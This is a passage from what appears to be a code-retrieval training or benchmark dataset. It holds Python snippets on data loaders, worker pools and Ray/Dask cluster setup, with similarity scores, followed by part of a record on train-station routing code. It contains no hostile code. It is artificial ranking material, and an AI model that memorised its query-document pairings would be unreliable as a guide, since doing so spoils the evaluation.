batch_length] = data[0] # assuming the first return value of data is the image sample!\n pointer += batch_length\n print(f\"[{pointer} / {len(dataset)}] samples processed.\")\n\n print(f'Dataset sucessfully cached into RAM.')", "def __init__(__self__, *,\n threads_per_core: int):\n pulumi.set(__self__, \"threads_per_core\", threads_per_core)", "def create_worker(num_worker, server_ip, server_port):\n for i in range(int(num_worker)):\n print \"-- worker initializing --\"\n dask_server = Worker('tcp://'+server_ip+\":\"+str(server_port), loop=loop)\n dask_server.start()", "def get_data_loader(batch_size=10, num_workers=2):\n \n data_loader = torch.utils.data.DataLoader(dataset=TempuckeyDataSet(),\n batch_size=batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=num_workers,\n collate_fn=collate)\n return data_loader", "def _call_initialization(self,\r\n input_fp,\r\n output_dir,\r\n params,\r\n job_prefix,\r\n poll_directly,\r\n suppress_submit_jobs):\r\n self.prefix_counts = {}", "def init_processes(cfg, local_rank, dataset, fn, backend='nccl'):\n addr = \"localhost\"\n port = cfg.training.master_port\n os.environ['MASTER_ADDR'] = addr\n os.environ['MASTER_PORT'] = str(port)\n dist.init_process_group(backend, rank=0 + local_rank,\n world_size=cfg.training.gpus)\n\n device = torch.device(\"cuda:{}\".format(local_rank))\n\n fn(cfg, local_rank, device, corpus_path=dataset)", "def preprocessing(pairs, nb=4):\n generated = Parallel(n_jobs=nb, verbose=5)(delayed(_load_brick)(*p) for p in pairs)\n return generated", "def get_each_loader(data_path, batch_size, trn_negnum, shuffle=True, num_workers=0):\n \n dataset = ML_Dataset(data_path, trn_negnum)\n \n if data_path.endswith('trn') == True:\n collate = dataset.train_collate\n else:\n collate = test_collate\n\n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate)\n\n return data_loader", "def __init__(self, generator_func, dtypes, shapes, n_worker, device=None):\n self.dtypes = tuple([tf.as_dtype(each) for each in dtypes])\n self.shapes = tuple(shapes)\n # Construct dataset\n self.dataset = tf.data.Dataset.range(n_worker).repeat().apply(\n tf.contrib.data.parallel_interleave(\n lambda x: tf.data.Dataset.from_generator(generator_func, self.dtypes, self.shapes),\n cycle_length=n_worker, sloppy=True)) # parallel generators\n self.dataset = self.dataset.prefetch(n_worker)\n if device is not None:\n self.dataset = self.dataset.apply(tf.contrib.data.prefetch_to_device(device))\n self.iterator = self.dataset.make_one_shot_iterator()\n self.batch_data = self.iterator.get_next()", "def __init__(self, data_path):\r\n\t\tfile_names = ['data_batch_%d' % i for i in range(1,6)]\r\n\t\tfile_names.append('test_batch')\r\n\r\n\t\tX = []\r\n\t\ty = []\r\n\t\tfor file_name in file_names:\r\n\t\t\twith open(data_path + file_name) as fin:\r\n\t\t\t\tdata_dict = cPickle.load(fin)\r\n\t\t\tX.append(data_dict['data'].ravel())\r\n\t\t\ty = y + data_dict['labels']\r\n\r\n\t\tself.X = np.asarray(X).reshape(60000, 32*32*3)\r\n\t\tself.y = np.asarray(y)\r\n\r\n\t\tfin = open(data_path + 'batches.meta')\r\n\t\tself.LABEL_NAMES = cPickle.load(fin)['label_names']\r\n\t\tfin.close()", "def _initialize(self) -> None:\n p = self.params\n # We make self.input public so that users can access its methods like\n # IdsToStrings if needed.\n with py_utils.infeed_context_scope(\n infeed_host_index=p.infeed_host_index,\n num_infeed_hosts=p.num_infeed_hosts):\n self.input = p.input.Instantiate()\n\n if hasattr(self.input, 'datasource') and isinstance(\n self.input.datasource, datasource.TFDatasetSource):\n # For the special case when the input is implemented by a tf.data.Dataset,\n # use it directly. Otherwise roundtrip adaptions may result in returning\n # duplciate batches.\n self._get_next_fn = self.input.datasource.GetNext\n else:\n self._get_next_fn = tf.function(self._get_batch)\n self._num_batches_produced = 0", "def minibatch_loader_thread(self):\r\n \r\n blobs = self.get_next_minibatch()\r\n \r\n ordered_blobs = OrderedDict()\r\n \r\n for key in self.get_output_names(): \r\n ordered_blobs[key] = blobs[key]", "def init_workers():\n party_queue = Queue()\n p = Producer(party_queue)\n p.daemon = True\n c = Consumer(party_queue)\n c.deamon= True\n m = MasterUpdater(db,application_name)\n m.deamon = True\n p.start()\n c.start()\n m.start()", "def initialize_multiprocessing(self):\n if self.multiprocessing_controller is not None:\n MPControl.set_multiprocess_engine(self.multiprocessing_controller)\n MPControl.connect()", "def init_distributed(backend, world_size, rank, checkpoint_dir):\n # multi-gpu initial\n logger.debug(f'Initializing {world_size} workers')\n # Remove the init file from previous version\n init_dir = checkpoint_dir / 'shared_distributed'\n if init_dir.is_file():\n rm_file(init_dir)\n\n init_dir.mkdir(parents=True, exist_ok=True)\n init_file = init_dir / f'slurm-{slurm.job_id}'\n init_method = init_file.resolve().as_uri()\n dist.init_process_group(backend, world_size=world_size, rank=rank, init_method=init_method)\n logger.debug('Init finished')", "def _initialize_backend(self):\n try:\n n_jobs = self._backend.configure(n_jobs=self.n_jobs, parallel=self,\n **self._backend_args)\n if self.timeout is not None and not self._backend.supports_timeout:\n warnings.warn(\n 'The backend class {!r} does not support timeout. '\n \"You have set 'timeout={}' in Parallel but \"\n \"the 'timeout' parameter will not be used.\".format(\n self._backend.__class__.__name__,\n self.timeout))\n\n except FallbackToBackend as e:\n # Recursively initialize the backend in case of requested fallback.\n self._backend = e.backend\n n_jobs = self._initialize_backend()\n\n return n_jobs", "def Initialize(self):\n self.queue_workers = [\n gevent.spawn(self._EventQueueWorker) for _ in xrange(self.num_workers)]\n self.gc_worker = gevent.spawn(self._GarbageCollectorWorker)", "def __initializeDistributed(self):\n self.raiseADebug(\"Initializing parallel InternalParallel: {0} Nodes: {1}\".format(self.runInfoDict['internalParallel'],len(self.runInfoDict['Nodes'])))\n if self._parallelLib != ParallelLibEnum.shared:\n # dashboard?\n db = self.runInfoDict['includeDashboard']\n # Check if the list of unique nodes is present and, in case, initialize the\n servers = None\n sys.path.append(self.runInfoDict['WorkingDir'])\n if 'UPDATE_PYTHONPATH' in self.runInfoDict:\n sys.path.extend([p.strip() for p in self.runInfoDict['UPDATE_PYTHONPATH'].split(\":\")])\n\n if _rayAvail:\n # update the python path and working dir\n olderPath = os.environ[\"PYTHONPATH\"].split(os.pathsep) if \"PYTHONPATH\" in os.environ else []\n os.environ[\"PYTHONPATH\"] = os.pathsep.join(set(olderPath+sys.path))\n\n # is ray instanciated outside?\n self.rayInstanciatedOutside = 'headNode' in self.runInfoDict\n self.daskInstanciatedOutside = 'schedulerFile' in self.runInfoDict\n if len(self.runInfoDict['Nodes']) > 0 or self.rayInstanciatedOutside or self.daskInstanciatedOutside:\n availableNodes = [nodeId.strip() for nodeId in self.runInfoDict['Nodes']]\n uniqueN = list(set(availableNodes))\n # identify the local host name and get the number of local processors\n localHostName = self.__getLocalHost()\n self.raiseADebug(\"Head host name is : \", localHostName)\n # number of processors\n nProcsHead = availableNodes.count(localHostName)\n if not nProcsHead:\n self.raiseAWarning(\"# of local procs are 0. Only remote procs are avalable\")\n self.raiseAWarning(f'Head host name \"{localHostName}\" /= Avail Nodes \"'+', '.join(uniqueN)+'\"!')\n self.raiseADebug(\"# of local procs : \", str(nProcsHead))\n self.raiseADebug(\"# of total procs : \", str(len(availableNodes)))\n if nProcsHead != len(availableNodes) or self.rayInstanciatedOutside or self.daskInstanciatedOutside:\n if self.rayInstanciatedOutside:\n address = self.runInfoDict['headNode']\n elif self.daskInstanciatedOutside:\n self.daskSchedulerFile = self.runInfoDict['schedulerFile']\n else:\n # create head node cluster\n # port 0 lets ray choose an available port\n address = self.__runHeadNode(nProcsHead, 0)\n if self._parallelLib == ParallelLibEnum.ray:\n # add names in runInfo\n self.runInfoDict['headNode'] = address\n self.raiseADebug(\"Head host IP :\", address)\n if self._parallelLib == ParallelLibEnum.dask:\n # add file in runInfo\n self.runInfoDict['schedulerFile'] = self.daskSchedulerFile\n self.raiseADebug('scheduler file :', self.daskSchedulerFile)\n ## Get servers and run ray or dask remote listener\n if self.rayInstanciatedOutside or self.daskInstanciatedOutside:\n servers = self.runInfoDict['remoteNodes']\n else:\n servers = self.__runRemoteListeningSockets(address, localHostName)\n # add names in runInfo\n self.runInfoDict['remoteNodes'] = servers\n if self._parallelLib == ParallelLibEnum.ray:\n ## initialize ray server with nProcs\n self._server = ray.init(address=address,log_to_driver=False,include_dashboard=db)\n elif self._parallelLib == ParallelLibEnum.dask:\n if self.daskSchedulerFile is not None:\n #handle multinode and prestarted configurations\n self._server = dask.distributed.Client(scheduler_file=self.daskSchedulerFile)\n else:\n #Start locally\n cluster = dask.distributed.LocalCluster()\n self._server = dask.distributed.Client(cluster)\n else:\n self.raiseAWarning(\"No supported server\")\n if self._parallelLib == ParallelLibEnum.ray:\n self.raiseADebug(\"NODES IN THE CLUSTER : \", str(ray.nodes()))\n else:\n if self._parallelLib == ParallelLibEnum.ray:\n self.raiseADebug(\"Executing RAY in the cluster but with a single node configuration\")\n self._server = ray.init(num_cpus=nProcsHead,log_to_driver=False,include_dashboard=db)\n elif self._parallelLib == ParallelLibEnum.dask:\n self.raiseADebug(\"Executing DASK in the cluster but with a single node configuration\")\n #Start locally\n cluster = dask.distributed.LocalCluster()\n self._server = dask.distributed.Client(cluster)\n else:\n self.raiseADebug(\"Initializing\", str(self._parallelLib), \"locally with num_cpus: \", self.runInfoDict['totalNumCoresUsed'])\n if self._parallelLib == ParallelLibEnum.ray:\n self._server = ray.init(num_cpus=int(self.runInfoDict['totalNumCoresUsed']),include_dashboard=db)\n elif self._parallelLib == ParallelLibEnum.dask:\n #handle local method\n cluster = dask.distributed.LocalCluster(n_workers=int(self.runInfoDict['totalNumCoresUsed']))\n self._server = dask.distributed.Client(cluster)\n else:\n self.raiseAWarning(\"parallellib creation not handled\")\n if self._parallelLib == ParallelLibEnum.ray:\n self.raiseADebug(\"Head node IP address: \", self._server.address_info['node_ip_address'])\n self.raiseADebug(\"Redis address : \", self._server.address_info['redis_address'])\n self.raiseADebug(\"Object store address: \", self._server.address_info['object_store_address'])\n self.raiseADebug(\"Raylet socket name : \", self._server.address_info['raylet_socket_name'])\n self.raiseADebug(\"Session directory : \", self._server.address_info['session_dir'])\n self.raiseADebug(\"GCS Address : \", self._server.address_info['gcs_address'])\n if servers:\n self.raiseADebug(\"# of remote servers : \", str(len(servers)))\n self.raiseADebug(\"Remote servers : \", \" , \".join(servers))\n else:\n self.raiseADebug(\"JobHandler initialized without ray\")\n else:\n ## We are just using threading\n self._server = None\n self.raiseADebug(\"JobHandler initialized with threading\")\n # ray or dask is initialized\n self.__isDistributedInitialized = True", "def worker_init_fn(worker_id):\n np.random.seed(np.random.get_state()[1][0] + worker_id)", "def worker_init_fn(worker_id):\n np.random.seed(np.random.get_state()[1][0] + worker_id)", "def __init__(__self__, *,\n batch_node_count: Optional[pulumi.Input[int]] = None,\n batch_percentage: Optional[pulumi.Input[float]] = None,\n batch_soak_duration: Optional[pulumi.Input[str]] = None):\n if batch_node_count is not None:\n pulumi.set(__self__, \"batch_node_count\", batch_node_count)\n if batch_percentage is not None:\n pulumi.set(__self__, \"batch_percentage\", batch_percentage)\n if batch_soak_duration is not None:\n pulumi.set(__self__, \"batch_soak_duration\", batch_soak_duration)", "def __init__(self, pool_size):\n \n self.pool_size=pool_size;", "def __init__(self):\n super().__init__()\n self.printTag = 'Job Handler' # Print tag of this object\n self.runInfoDict = {} # Container of the running info (RunInfo block in the input file)\n self.__isDistributedInitialized = False # Is Ray or Dask Initialized?\n self._server = None # Variable containing the info about the RAY or DASK parallel server.\n # If None, multi-threading is used\n self.sleepTime = 1e-4 # Sleep time for collecting/inquiring/submitting new jobs\n self.completed = False # Is the execution completed? When True, the JobHandler is shut down\n self.__profileJobs = False # Determines whether to collect and print job timing summaries at the end of job runs.\n self.maxQueueSize = None # Prevents the pending queue from growing indefinitely, but also\n # allowing extra jobs to be queued to prevent starving\n # parallelized environments of jobs.\n\n ############################################################################\n # The following variables are protected by the __queueLock\n\n # Placeholders for each actively running job. When a job finishes, its\n # spot in one of these lists will be reset to None and the next Runner will\n # be placed in a free None spot, and set to start\n self.__running = []\n self.__clientRunning = []\n\n # Queue of jobs to be run, when something on the list above opens up, the\n # corresponding queue will pop a job (Runner) and put it into that location\n # and set it to start\n self.__queue = collections.deque()\n self.__clientQueue = collections.deque()\n\n # A counter used for uniquely identifying the next id for an ExternalRunner\n # InternalRunners will increment this counter, but do not use it currently\n self.__nextId = 0\n\n # List of finished jobs. When a job finishes, it is placed here until\n # something from the main thread can remove them.\n self.__finished = []\n\n # End block of __queueLock protected variables\n ############################################################################\n\n self.__queueLock = threading.RLock()\n # List of submitted job identifiers, includes jobs that have completed as\n # this list is not cleared until a new step is entered\n self.__submittedJobs = []\n # Dict of failed jobs of the form { identifier: metadata }\n self.__failedJobs = {}\n # Dict containing info about batching\n self.__batching = collections.defaultdict()\n self.rayInstanciatedOutside = None\n self.daskInstanciatedOutside = None\n self.remoteServers = None\n self.daskSchedulerFile = None\n self._daskScheduler = None", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)", "def _create_jobs(self):\n try:\n self.request_master_socket.send_multipart([remote_constants.WORKER_CONNECT_TAG])\n _ = self.request_master_socket.recv_multipart()\n except zmq.error.Again as e:\n logger.error(\"Can not connect to the master, \" \"please check if master is started.\")\n self.master_is_alive = False\n return\n\n initialized_jobs = self._init_jobs(job_num=self.device_count)\n self.request_master_socket.setsockopt(zmq.RCVTIMEO, remote_constants.HEARTBEAT_TIMEOUT_S * 1000)\n\n def master_heartbeat_exit_callback_func():\n logger.warning(\"[Worker] lost connection with the master, will exit reply heartbeat for master.\")\n if self.worker_status is not None:\n self.worker_status.clear()\n self.log_server_proc.kill()\n self.log_server_proc.wait()\n # exit the worker\n self.exit()\n\n self.master_heartbeat_thread = HeartbeatServerThread(\n heartbeat_exit_callback_func=master_heartbeat_exit_callback_func)\n self.master_heartbeat_thread.setDaemon(True)\n self.master_heartbeat_thread.start()\n self.master_heartbeat_address = self.master_heartbeat_thread.get_address()\n\n logger.set_dir(\n os.path.expanduser('~/.parl_data/worker/{}'.format(self.master_heartbeat_address.replace(':', '_'))))\n if self.cpu_num:\n logger.info(\"[Worker] Connect to the master node successfully. \" \"({} CPUs)\".format(self.cpu_num))\n elif self.gpu_num:\n logger.info(\"[Worker] Connect to the master node successfully. \" \"({} GPUs)\".format(self.gpu_num))\n\n for job in initialized_jobs:\n job.worker_address = self.master_heartbeat_address\n\n allocated_cpu = AllocatedCpu(self.master_heartbeat_address, self.cpu_num)\n allocated_gpu = AllocatedGpu(self.master_heartbeat_address, self.gpu)\n initialized_worker = InitializedWorker(self.master_heartbeat_address, initialized_jobs, allocated_cpu,\n allocated_gpu, socket.gethostname())\n self.request_master_socket.send_multipart(\n [remote_constants.WORKER_INITIALIZED_TAG,\n cloudpickle.dumps(initialized_worker)])\n\n message = self.request_master_socket.recv_multipart()\n if message[0] == remote_constants.REJECT_CPU_WORKER_TAG:\n logger.error(\"GPU cluster rejects a CPU worker to join in\")\n self.worker_is_alive = False\n elif message[0] == remote_constants.REJECT_GPU_WORKER_TAG:\n logger.error(\"CPU cluster rejects a GPU worker to join in\")\n self.worker_is_alive = False\n else:\n self.worker_status = WorkerStatus(self.master_heartbeat_address, initialized_jobs, self.cpu_num,\n self.gpu_num)", "def __init__(self, ops: Callable, batch_size: int = 4,\n num_workers: int = 8, path_to_data: str = './project/dataset/few_shot/'):\n super(FewShotDataModule, self).__init__()\n\n self.ops = ops\n self.path_to_data = path_to_data\n self.batch_size = batch_size\n self.num_workers = num_workers\n\n self.splits = {} # Contains train and valid splits.\n self.datasets = {} # Contains instances of the Dataset class. One per data spit.\n self.class_map = dict(zip(CLASS_NAMES, range(len(CLASS_NAMES))))\n self.weights = [0] * len(CLASS_NAMES)", "def __init__(self , driver = None, max_submit = 1 , size = 0):\n \n OK_file = None \n exit_file = None\n \n c_ptr = cfunc.alloc( max_submit , OK_file , exit_file)\n self.init_cobj( c_ptr , cfunc.free )\n \n self.jobs = JobList()\n self.size = size\n \n self.exists = exList( self.jobs )\n self.status = statusList( self.jobs )\n self.run_time = runtimeList( self.jobs , self )\n \n self.start( blocking = False )\n if driver:\n self.driver = driver\n cfunc.set_driver( self , driver.c_ptr )", "def __init__(\n self, batch_size: int = 64, num_workers: int = 0, **kwargs: Any\n ) -> None:\n super().__init__(EuroSAT, batch_size, num_workers, **kwargs)", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)\n \n self._results_ = None", "def __init__(self):\n self.label = \"Partition NNInput Files\"\n self.description = \"Partitions Neural Network class.dta of more than 200,000 records into files of 200,000 or less.\"\n self.canRunInBackground = False\n self.category = \"Neural network\"", "def init_loaders(self, *args, **kwargs):\n\n # Convert the data to Dataset\n dataset_dict = self.init_datasets(*args, **kwargs)\n\n # If the Dataset implements collate_fn, that is used. Otherwise, default_collate is used\n if hasattr(dataset_dict[\"train\"], \"collate_fn\") and callable(\n getattr(dataset_dict[\"train\"], \"collate_fn\")\n ):\n collate_fn = dataset_dict[\"train\"].collate_fn\n else:\n collate_fn = default_collate\n\n # If 'iters_per_epoch' is defined, then a fixed number of random sample batches from the training set\n # are drawn per epoch.\n # Otherwise, an epoch is defined by a full run through all of the data in the dataloader.\n #\n if self.config_dict.get(\"iters_per_epoch\") is not None:\n num_samples = (\n self.config_dict[\"iters_per_epoch\"] * self.config_dict[\"batch_size\"]\n )\n loaders_dict = {}\n for key in dataset_dict.keys():\n if key == \"train\":\n loaders_dict[key] = DataLoader(\n dataset_dict[key],\n batch_sampler=BatchSampler(\n RandomSampler(\n dataset_dict[key],\n replacement=True,\n num_samples=num_samples,\n ),\n batch_size=self.config_dict[\"batch_size\"],\n drop_last=False,\n ),\n collate_fn=collate_fn,\n )\n else:\n loaders_dict[key] = DataLoader(\n dataset_dict[key],\n batch_size=self.config_dict[\"batch_size\"],\n collate_fn=collate_fn,\n )\n else:\n loaders_dict = {\n key: DataLoader(\n dataset_dict[key],\n batch_size=self.config_dict[\"batch_size\"],\n collate_fn=collate_fn,\n )\n for key in data_dict.keys()\n }\n\n return loaders_dict", "def __init__(self, threads_count):\n\n self.queue = Queue(threads_count)\n\n self.threads = []\n self.device = None\n\n self.create_workers(threads_count)\n self.start_workers()", "def __init__(self, pool, params = None):\n\n # initialize thread\n Thread.__init__(self)\n\n # store link to threads pool\n self.pool = pool\n\n # set control parameteres\n self.threadsWorking = 0\n try:\n self.delay = params['delay']\n except KeyError:\n self.delay = 30\n try:\n self.maxJobs = params['jobsToPoll']\n except KeyError:\n self.maxJobs = 100\n\n self.sessionPool = params['sessionPool']\n self.groupsUnderProcessing = Set([])\n self.jobPerTask = None\n\n # start scheduler thread\n self.setDaemon(1)\n self.start()", "def __init__(self, config, maxCores, maxMemory, maxDisk):\n self.config = config\n self.maxCores = maxCores\n self.maxMemory = maxMemory\n self.maxDisk = maxDisk\n self.environment = {}\n \"\"\"\n :type dict[str,str]\n \"\"\"\n self.workerCleanupInfo = WorkerCleanupInfo(workDir=self.config.workDir,\n workflowID=self.config.workflowID,\n cleanWorkDir=self.config.cleanWorkDir)", "def __init__(self, parallel_num=4):\n from concurrent.futures import ThreadPoolExecutor\n self.executor = ThreadPoolExecutor(max_workers=parallel_num)", "def __init__(self, \n fname_templates,\n fname_spike_train,\n reader,\n fname_out,\n dtype_out):\n #self.logger = logging.getLogger(__name__)\n\n # keep templates and spike train filname\n # will be loaded during each prallel process\n self.fname_templates = fname_templates\n self.fname_spike_train = fname_spike_train\n\n self.reader = reader\n\n # save output name and dtype\n self.fname_out = fname_out\n self.dtype_out = dtype_out" ]
[ "0.7315344", "0.71394104", "0.69043654", "0.67671055", "0.67395073", "0.66971", "0.6604564", "0.6591444", "0.656487", "0.65599173", "0.6558237", "0.65196973", "0.6494201", "0.648432", "0.63900125", "0.6368222", "0.63650346", "0.63589203", "0.63572824", "0.6347132", "0.63001454", "0.6292539", "0.6282449", "0.6282194", "0.6260865", "0.62605554", "0.62597615", "0.6244845", "0.6227652", "0.6222328", "0.6207713", "0.6194747", "0.6176453", "0.61442196", "0.61330783", "0.6113565", "0.61031914", "0.6077364", "0.6061316", "0.6053784", "0.60468054", "0.60414636", "0.60386556", "0.6030019", "0.6012165", "0.59896725", "0.5988417", "0.59857565", "0.5985405", "0.59704125", "0.59704125", "0.59685344", "0.5965752", "0.5960198", "0.59569263", "0.59466326", "0.5944444", "0.59401923", "0.59260535", "0.59260535", "0.59215087", "0.5915642", "0.5914943", "0.5911792", "0.5911356", "0.59098756", "0.5901214", "0.5897627", "0.5891741", "0.5881683", "0.5880973", "0.58781224", "0.5868659", "0.5858555", "0.58430195", "0.58370113", "0.58335185", "0.5830051", "0.58237606", "0.5822499", "0.58181053", "0.58055246", "0.57891834", "0.5768597", "0.5768597", "0.57655275", "0.5763134", "0.5760156", "0.57566714", "0.5755784", "0.5745833", "0.5743095", "0.5742559", "0.57407117", "0.573072", "0.57284635", "0.5728118", "0.5725148", "0.57177794", "0.571675", "0.57138556" ]
0.0
-1
Chooses starting station based on the least amount of connections and adds it to a new track.
def create_new_track(self, station_list, i, new_grid): self.first_station = self.stations[station_list.pop(0)] track = Track(f"depthfirst_{i}", new_grid) track.add_station(new_grid, self.first_station.name) return track
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pick_next_station(self, station):\n self.best_score = 0\n\n stations = self.grid.stations\n # all connections of the last added added station \n lookahead_1 = self.grid.get_station(self.best_connection[1]).connections\n\n for la1 in lookahead_1.values():\n next_station = la1[0].name\n # if adding the connection exceeds the tracks max time length \n if self.track.add_station(self.grid, next_station) is False:\n break\n\n lookahead_2 = self.grid.get_station(la1[0].name).connections\n\n # keeps adding stations untill the time limit is reached\n for la2 in lookahead_2:\n la2 = stations.get(la2)\n if self.track.add_station(self.grid, la2.name) is False:\n break\n \n quality = self.grid.get_quality()\n \n self.track.remove_last_station()\n\n # if quality improves, add first station to the track\n if quality > self.best_score:\n self.best_score = quality \n self.best_connection = [la2.name, la1[0].name]\n \n self.track.remove_last_station()", "def pick_first_connection(self):\n self.best_connection = []\n stations = list(self.grid.stations.values())\n\n # add a first station to the track \n for station in stations:\n self.track = Track(f\"greedy_track_{self.count}\", self.grid)\n self.track.add_station(self.grid, station.name)\n\n lookahead_1 = station.connections\n\n # calculate quality of all connections and save the best connection\n for la1 in lookahead_1: \n next_station = stations[int(la1)].name\n self.track.add_station(self.grid, next_station)\n lookahead_2 = stations[int(la1)].get_connections()\n \n for la2 in lookahead_2:\n # if adding the connection exceeds the track's max time length \n if self.track.add_station(self.grid, la2[0].name) is False:\n break\n \n quality = self.grid.get_quality()\n self.track.remove_last_station()\n\n # checks if the quality of the track is the best one yet and remembers it\n if quality > self.best_score:\n self.best_score = quality \n self.best_connection = [station.name, stations[int(la1)].name, la2[0].name]\n self.track.remove_last_station()\n \n # if adding another track does not lead to a better quality, stop algorithm\n if self.best_connection == []:\n return False\n \n # add best connection to the track\n self.track = Track(f\"greedy_track_{self.count}\", self.grid)\n self.track.add_station(self.grid, self.best_connection[0])\n\n self.count += 1\n\n return station", "def add_connection_beginning(self, route, potential_solution):\n\n current_station = route.stations[0]\n\n # pick a random new station out of all connections of the current station\n new_station = random.choice(list(current_station.connections.keys()))\n\n # find the connection between the two stations \n link = current_station.connections[new_station] \n\n # find the time of the connection \n time = link.time \n \n\n # only accept the change if it wouldn't exceed the maximum time\n if time + route.total_time <= self.max_minutes:\n \n # insert the connection to the front of the connection list\n route.insert_connection(link, time, 0)\n\n # insert the station to the front of the station list\n route.insert_station(new_station, 0)", "def visit_all_possibilities(self, first_station, track, grid):\n # loops over connections of station\n for connection in first_station.connections:\n # keeps adding untill the max length of a track is reached\n if track.add_station(grid, self.stations[connection].name):\n # calculates the quality of adding the station and remembers it if it is the best score yet\n if grid.get_quality() > self.best_score:\n self.best_score = grid.get_quality()\n self.grid = copy.deepcopy(grid)\n print(f\"new best score: {self.best_score}:\\n{self.grid}\\n\\n\")\n\n # repeat untill there are no more configurations left\n self.visit_all_possibilities(self.stations[connection], track, grid)\n track.remove_last_station()", "def shortest_path(self):\n\t\t#dict that will hold the cost of traveling to each station\n\t\t#add the initial cost of the starting station, which is 0\n\t\tD = {0:0}\n\n\t\t#add all of our dict keys (stations) to our queue\n\t\tstation_queue = self.station_graph.keys()\n\n\t\t#sort the keys! since the graph is directed and acyclic, the stations\n\t\t#can be explored one at a time, in order, without having to adjust\n\t\t#for the lowest distance value via priority queue.\n\t\t#\n\t\t#sort them with reverse=True so that they can be popped from the\n\t\t#end of the list instead of from the beginning. This should save\n\t\t#some cpu time.\n\t\tstation_queue.sort(reverse=True)\n\t\twhile len(station_queue) > 0:\n\n\t\t\tstation = station_queue.pop() #grab the next node in the queue\n\n\t\t\tfor next_st, next_cost in self.station_graph[station].iteritems():\n\t\t\t\t#loops through the current station's neighbors, and calculates\n\t\t\t\t#their costs from the starting node, making sure to store\n\t\t\t\t#the lowest cost in our D dict\n\t\t\t\talt = D[station] + next_cost #sum the costs\n\t\t\t\tif not D.has_key(next_st) or alt < D[next_st]:\n\t\t\t\t\t#if there is no cost on record, or if the newly calculated\n\t\t\t\t\t#cost is lower than the currently recorded one, then\n\t\t\t\t\t#record the newly calculated cost as the lowest\n\t\t\t\t\tD[next_st] = alt #set the cost to get to next_st\n\n\t\treturn D[self.final_stop]", "def _select_destination(self):\n # Ideally this should do something clever based on the start location\n # ie known trips. But for now, it will pick randomly!\n station_dict = self.network.station_dict\n\n stations = list(station_dict.keys())\n #stations = [x for x in stations if isinstance(x, int) or x.startswith(\"801\")]\n #stations = [x for x in stations if isinstance(x, int) or x.startswith(\"80139\")]\n weights = [station_dict[x].in_popularity for x in stations]\n\n # pick using the given weight distributions\n self.dest = random.choices(stations, weights=weights)[0]\n\n return", "def greedy_initial(self):\r\n sol = [] # [[0;2;5;0;4;6;0],[],...]\r\n sol_veh_type = [] # corresponding vehicle type for the solution\r\n route_way_time = []\r\n\r\n to_vist = [i+1 for i in range(store_num - 1)] # [1,5,8,...]\r\n itr = 0\r\n\r\n while len(to_vist) > 0 and itr < 500:\r\n itr += 1\r\n\r\n if itr <= small_veh_cnt:\r\n vehicle_type0 = 2\r\n elif itr <= small_veh_cnt + medium_veh_cnt:\r\n vehicle_type0 = 3\r\n else:\r\n vehicle_type0 = 5\r\n\r\n sol_veh_type.append(vehicle_type0)\r\n\r\n used_res = [0, 0, 0, 0] # used volume, and travel time of the vehicle, leave time, travel distance\r\n veh_rout = [0]\r\n\r\n # print '\\nA new vehicle will be used.'\r\n way_time = 0 # travel time of coming to the store + wait time at the store + operation time at this store\r\n while True:\r\n curr_cust = veh_rout[-1]\r\n\r\n next_one, way_time = self.time_nn(way_time, curr_cust, to_vist, used_res, len(veh_rout), vehicle_type0)\r\n next_cust, next_start = next_one[0], next_one[1]\r\n # print('next start', next_cust, next_start)\r\n if next_cust == 0: # next visiting customer is depot\r\n # print 'Get back to the depot, and ready for a new round.'\r\n veh_rout.append(next_cust)\r\n break\r\n\r\n else: # next visiting customer is a store\r\n used_res[0] += (num_demd[next_cust][0] * bskt_vol + num_demd[next_cust][1] * trsf_vol + (num_demd[next_cust][2] + \\\r\n num_demd[next_cust][3]) * milk_vol + num_demd[next_cust][4] * paper_bskt)\r\n used_res[2] = (next_start + oprt_t)\r\n used_res[3] += dist_mat[curr_cust, next_cust]\r\n\r\n\r\n veh_rout.append(next_cust)\r\n # print 'Vehicle used resource: ', used_res\r\n to_vist.remove(next_cust)\r\n\r\n sol.append(veh_rout)\r\n route_way_time.append(way_time)\r\n\r\n # print 'Last point 0 earliest leave time: ', int(used_res[-1]) / 60, ':', int(used_res[-1]) % 60\r\n # print 'Route %s is: ' % itr, veh_rout\r\n print('*'*10, 'Iteration:', itr, '*'*10)\r\n\r\n\r\n if len(to_vist) > 0:\r\n print('number of stores remained: ', len(to_vist))\r\n\r\n return sol, sol_veh_type, route_way_time", "async def set_station(self: SimpleNWS, station: Optional[str] = None) -> None:\n if station:\n self.station = station\n if not self.stations:\n self.stations = [self.station]\n else:\n self.stations = await self.get_points_stations()\n self.station = self.stations[0]", "def add_station(self, station_id=None, time=None, location=None):", "def shortest_tour(tours):\n return min(tours, key=tour_length)", "def _choose_best_trip(self):\n times = [(key, self._trips_dict[key].get_duration()) for key in self._trips_dict.keys()\n if self._trips_dict[key] is not None]\n self._primary_mode = min(times, key=lambda tup: tup[1])[0]", "def add_station(self, station):\n self.__stations.append(station)", "def __init__(self, station_definition=None, number_of_packets_in_record=None, packet_number_in_record=None):", "def __init__(self, station_definition=None, number_of_packets_in_record=None, packet_number_in_record=None):", "def setTrackStartTime() :\n s.startTrack()", "def start_station(self):\n if Config.LOG_TO_CONSOLE and Config.LOG_INTERVAL:\n self._log_results(first_time=True)\n\n if Config.WEATHER_UPLOAD and Config.UPLOAD_INTERVAL:\n self._upload_results(first_time=True)\n\n if Config.UPDATE_DISPLAY and Config.UPDATE_INTERVAL:\n self._update_display()", "def make_tree(self):\n\n # list [station_name]\n visited = []\n\n # creates empty station object for each station and adds coordinates\n for station in self.stations:\n new_station = Station(station)\n coordinates = self.stations[station].get_coordinates()\n new_station.add_coordinates(coordinates[0], coordinates[1])\n\n # saves station in prims_tree dictionary\n self.prims_tree[station] = new_station\n\n # choose random beginning station\n random_station = random.choice(list(self.stations.values()))\n\n # sort station connections and retrieve shortest\n station_connections = random_station.get_connections()\n station_connections = sorted(station_connections.items(), key=operator.itemgetter(1))\n new_connection = station_connections.pop(0)\n new_station = new_connection[0]\n new_time = new_connection[1]\n\n # retrieve empty stations from prims_tree dictionary\n first_station = self.prims_tree[random_station.name]\n new_station = self.prims_tree[new_station.name]\n\n # add shortest connection to stations\n first_station.add_connection(new_station, new_time)\n 